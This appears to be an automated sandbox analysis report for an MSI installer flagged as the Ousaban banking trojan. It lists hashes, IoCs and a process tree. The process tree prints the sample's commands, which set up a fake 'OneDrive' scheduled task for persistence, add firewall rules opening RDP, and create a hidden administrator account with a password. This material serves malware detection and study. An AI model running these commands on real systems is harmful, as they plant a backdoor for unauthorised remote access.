Analysis
-
max time kernel
100s -
max time network
98s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
23/12/2021, 10:51
Static task
static1
Behavioral task
behavioral1
Sample
seucartao0021 0iictl3q h6ozq5.msi
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
seucartao0021 0iictl3q h6ozq5.msi
Resource
win10-en-20211208
General
-
Target
seucartao0021 0iictl3q h6ozq5.msi
-
Size
4.0MB
-
MD5
04573ca4c50c5c352ec0859d6a14953a
-
SHA1
1a6780e61a658511f141fa8305ed9a9f318f5518
-
SHA256
57675d518613f20edc235c2975eadba7aa15d19aa460df03b443c99cff0d26d1
-
SHA512
d2ac8b26969f25b9c4da413a54118bcfc181dd2bffdabc771119fb5837825d560807862ea4a75f0985b0e2c261d9678fc18a4975bb8c24399e5e248362d9664d
Malware Config
Signatures
-
suricata: ET MALWARE Ousaban Banker Checkin M1
suricata: ET MALWARE Ousaban Banker Checkin M1
-
suricata: ET MALWARE Ousaban Banker Checkin M2
suricata: ET MALWARE Ousaban Banker Checkin M2
-
suricata: ET MALWARE Ousaban Banker KeepAlive
suricata: ET MALWARE Ousaban Banker KeepAlive
-
suricata: ET MALWARE Ousaban Banker KeepAlive Response
suricata: ET MALWARE Ousaban Banker KeepAlive Response
-
suricata: ET MALWARE Ousaban Banker Server Response M1
suricata: ET MALWARE Ousaban Banker Server Response M1
-
suricata: ET MALWARE Ousaban Banker Server Response M2
suricata: ET MALWARE Ousaban Banker Server Response M2
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 560 MsiExec.exe 4 560 MsiExec.exe -
Executes dropped EXE 2 IoCs
pid Process 1668 JprZmiySPgWs.exe 604 IBGDDHhfx.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XQzoAxVaXeEv.lnk MsiExec.exe -
Loads dropped DLL 23 IoCs
pid Process 560 MsiExec.exe 560 MsiExec.exe 560 MsiExec.exe 560 MsiExec.exe 1668 JprZmiySPgWs.exe 560 MsiExec.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 1668 JprZmiySPgWs.exe 604 IBGDDHhfx.exe 604 IBGDDHhfx.exe 604 IBGDDHhfx.exe 604 IBGDDHhfx.exe 604 IBGDDHhfx.exe 604 IBGDDHhfx.exe 1948 Process not Found -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Modifies WinLogon 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" IBGDDHhfx.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Terminal Service 23122021\rdpwrap.ini IBGDDHhfx.exe File created C:\Program Files\Terminal Service 23122021\rdpwrap.dll IBGDDHhfx.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Installer\f75a296.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA537.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\f75a298.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIF731.tmp msiexec.exe File opened for modification C:\Windows\Installer\f75a296.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA332.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA4F7.tmp msiexec.exe File created C:\Windows\Installer\f75a298.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIF634.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 856 schtasks.exe -
Runs net.exe
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1812 msiexec.exe 1812 msiexec.exe 1668 JprZmiySPgWs.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1948 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1628 msiexec.exe Token: SeIncreaseQuotaPrivilege 1628 msiexec.exe Token: SeRestorePrivilege 1812 msiexec.exe Token: SeTakeOwnershipPrivilege 1812 msiexec.exe Token: SeSecurityPrivilege 1812 msiexec.exe Token: SeCreateTokenPrivilege 1628 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1628 msiexec.exe Token: SeLockMemoryPrivilege 1628 msiexec.exe Token: SeIncreaseQuotaPrivilege 1628 msiexec.exe Token: SeMachineAccountPrivilege 1628 msiexec.exe Token: SeTcbPrivilege 1628 msiexec.exe Token: SeSecurityPrivilege 1628 msiexec.exe Token: SeTakeOwnershipPrivilege 1628 msiexec.exe Token: SeLoadDriverPrivilege 1628 msiexec.exe Token: SeSystemProfilePrivilege 1628 msiexec.exe Token: SeSystemtimePrivilege 1628 msiexec.exe Token: SeProfSingleProcessPrivilege 1628 msiexec.exe Token: SeIncBasePriorityPrivilege 1628 msiexec.exe Token: SeCreatePagefilePrivilege 1628 msiexec.exe Token: SeCreatePermanentPrivilege 1628 msiexec.exe Token: SeBackupPrivilege 1628 msiexec.exe Token: SeRestorePrivilege 1628 msiexec.exe Token: SeShutdownPrivilege 1628 msiexec.exe Token: SeDebugPrivilege 1628 msiexec.exe Token: SeAuditPrivilege 1628 msiexec.exe Token: SeSystemEnvironmentPrivilege 1628 msiexec.exe Token: SeChangeNotifyPrivilege 1628 msiexec.exe Token: SeRemoteShutdownPrivilege 1628 msiexec.exe Token: SeUndockPrivilege 1628 msiexec.exe Token: SeSyncAgentPrivilege 1628 msiexec.exe Token: SeEnableDelegationPrivilege 1628 msiexec.exe Token: SeManageVolumePrivilege 1628 msiexec.exe Token: SeImpersonatePrivilege 1628 msiexec.exe Token: SeCreateGlobalPrivilege 1628 msiexec.exe Token: SeRestorePrivilege 1812 msiexec.exe Token: SeTakeOwnershipPrivilege 1812 msiexec.exe Token: SeRestorePrivilege 1812 msiexec.exe Token: SeTakeOwnershipPrivilege 1812 msiexec.exe Token: SeRestorePrivilege 1812 msiexec.exe Token: SeTakeOwnershipPrivilege 1812 msiexec.exe Token: SeRestorePrivilege 1812 msiexec.exe Token: SeTakeOwnershipPrivilege 1812 msiexec.exe Token: SeIncreaseQuotaPrivilege 672 WMIC.exe Token: SeSecurityPrivilege 672 WMIC.exe Token: SeTakeOwnershipPrivilege 672 WMIC.exe Token: SeLoadDriverPrivilege 672 WMIC.exe Token: SeSystemProfilePrivilege 672 WMIC.exe Token: SeSystemtimePrivilege 672 WMIC.exe Token: SeProfSingleProcessPrivilege 672 WMIC.exe Token: SeIncBasePriorityPrivilege 672 WMIC.exe Token: SeCreatePagefilePrivilege 672 WMIC.exe Token: SeBackupPrivilege 672 WMIC.exe Token: SeRestorePrivilege 672 WMIC.exe Token: SeShutdownPrivilege 672 WMIC.exe Token: SeDebugPrivilege 672 WMIC.exe Token: SeSystemEnvironmentPrivilege 672 WMIC.exe Token: SeRemoteShutdownPrivilege 672 WMIC.exe Token: SeUndockPrivilege 672 WMIC.exe Token: SeManageVolumePrivilege 672 WMIC.exe Token: 33 672 WMIC.exe Token: 34 672 WMIC.exe Token: 35 672 WMIC.exe Token: SeRestorePrivilege 1812 msiexec.exe Token: SeTakeOwnershipPrivilege 1812 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1628 msiexec.exe 560 MsiExec.exe 1628 msiexec.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 1812 wrote to memory of 560 1812 msiexec.exe 28 PID 1812 wrote to memory of 560 1812 msiexec.exe 28 PID 1812 wrote to memory of 560 1812 msiexec.exe 28 PID 1812 wrote to memory of 560 1812 msiexec.exe 28 PID 1812 wrote to memory of 560 1812 msiexec.exe 28 PID 1812 wrote to memory of 560 1812 msiexec.exe 28 PID 1812 wrote to memory of 560 1812 msiexec.exe 28 PID 560 wrote to memory of 672 560 MsiExec.exe 29 PID 560 wrote to memory of 672 560 MsiExec.exe 29 PID 560 wrote to memory of 672 560 MsiExec.exe 29 PID 560 wrote to memory of 672 560 MsiExec.exe 29 PID 1668 wrote to memory of 1584 1668 JprZmiySPgWs.exe 33 PID 1668 wrote to memory of 1584 1668 JprZmiySPgWs.exe 33 PID 1668 wrote to memory of 1584 1668 JprZmiySPgWs.exe 33 PID 1668 wrote to memory of 1584 1668 JprZmiySPgWs.exe 33 PID 1584 wrote to memory of 856 1584 cmd.exe 35 PID 1584 wrote to memory of 856 1584 cmd.exe 35 PID 1584 wrote to memory of 856 1584 cmd.exe 35 PID 1584 wrote to memory of 856 1584 cmd.exe 35 PID 1668 wrote to memory of 604 1668 JprZmiySPgWs.exe 36 PID 1668 wrote to memory of 604 1668 JprZmiySPgWs.exe 36 PID 1668 wrote to memory of 604 1668 JprZmiySPgWs.exe 36 PID 1668 wrote to memory of 604 1668 JprZmiySPgWs.exe 36 PID 604 wrote to memory of 1696 604 IBGDDHhfx.exe 38 PID 604 wrote to memory of 1696 604 IBGDDHhfx.exe 38 PID 604 wrote to memory of 1696 604 IBGDDHhfx.exe 38 PID 604 wrote to memory of 1696 604 IBGDDHhfx.exe 38 PID 604 wrote to memory of 1276 604 IBGDDHhfx.exe 42 PID 604 wrote to memory of 1276 604 IBGDDHhfx.exe 42 PID 604 wrote to memory of 1276 604 IBGDDHhfx.exe 42 PID 604 wrote to memory of 1276 604 IBGDDHhfx.exe 42 PID 604 wrote to memory of 1576 604 IBGDDHhfx.exe 44 PID 604 wrote to memory of 1576 604 IBGDDHhfx.exe 44 PID 604 wrote to memory of 1576 604 IBGDDHhfx.exe 44 PID 604 wrote to memory of 1576 604 IBGDDHhfx.exe 44 PID 1576 wrote to memory of 1760 1576 net.exe 46 PID 1576 wrote to memory of 1760 1576 net.exe 46 PID 1576 wrote to memory of 1760 1576 net.exe 46 PID 604 wrote to memory of 672 604 IBGDDHhfx.exe 47 PID 604 wrote to memory of 672 604 IBGDDHhfx.exe 47 PID 604 wrote to memory of 672 604 IBGDDHhfx.exe 47 PID 604 wrote to memory of 672 604 IBGDDHhfx.exe 47 PID 672 wrote to memory of 380 672 net.exe 49 PID 672 wrote to memory of 380 672 net.exe 49 PID 672 wrote to memory of 380 672 net.exe 49 PID 604 wrote to memory of 1292 604 IBGDDHhfx.exe 50 PID 604 wrote to memory of 1292 604 IBGDDHhfx.exe 50 PID 604 wrote to memory of 1292 604 IBGDDHhfx.exe 50 PID 604 wrote to memory of 1292 604 IBGDDHhfx.exe 50 PID 604 wrote to memory of 920 604 IBGDDHhfx.exe 52 PID 604 wrote to memory of 920 604 IBGDDHhfx.exe 52 PID 604 wrote to memory of 920 604 IBGDDHhfx.exe 52 PID 604 wrote to memory of 920 604 IBGDDHhfx.exe 52
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\seucartao0021 0iictl3q h6ozq5.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1628
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A5519FA3DFDDF8DBC1A7271889AD20C12⤵
- Blocklisted process makes network request
- Drops startup file
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
-
C:\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exeC:\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe /SC minute /MO 2 /IT /RU %USERNAME%2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe /SC minute /MO 2 /IT /RU Admin3⤵
- Creates scheduled task(s)
PID:856
-
-
-
C:\Users\Admin\CtGel FWIN\IBGDDHhfx.exe"C:\Users\Admin\CtGel FWIN\IBGDDHhfx.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵PID:1696
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=udp localport=3389 profile=any action=allow3⤵PID:1276
-
-
C:\Windows\system32\net.exenet user Administrat0r "123mudar" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Administrat0r "123mudar" /add4⤵PID:1760
-
-
-
C:\Windows\system32\net.exenet localgroup Administradores Administrat0r /add3⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administradores Administrat0r /add4⤵PID:380
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵PID:1292
-
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f3⤵PID:920
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2012
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1876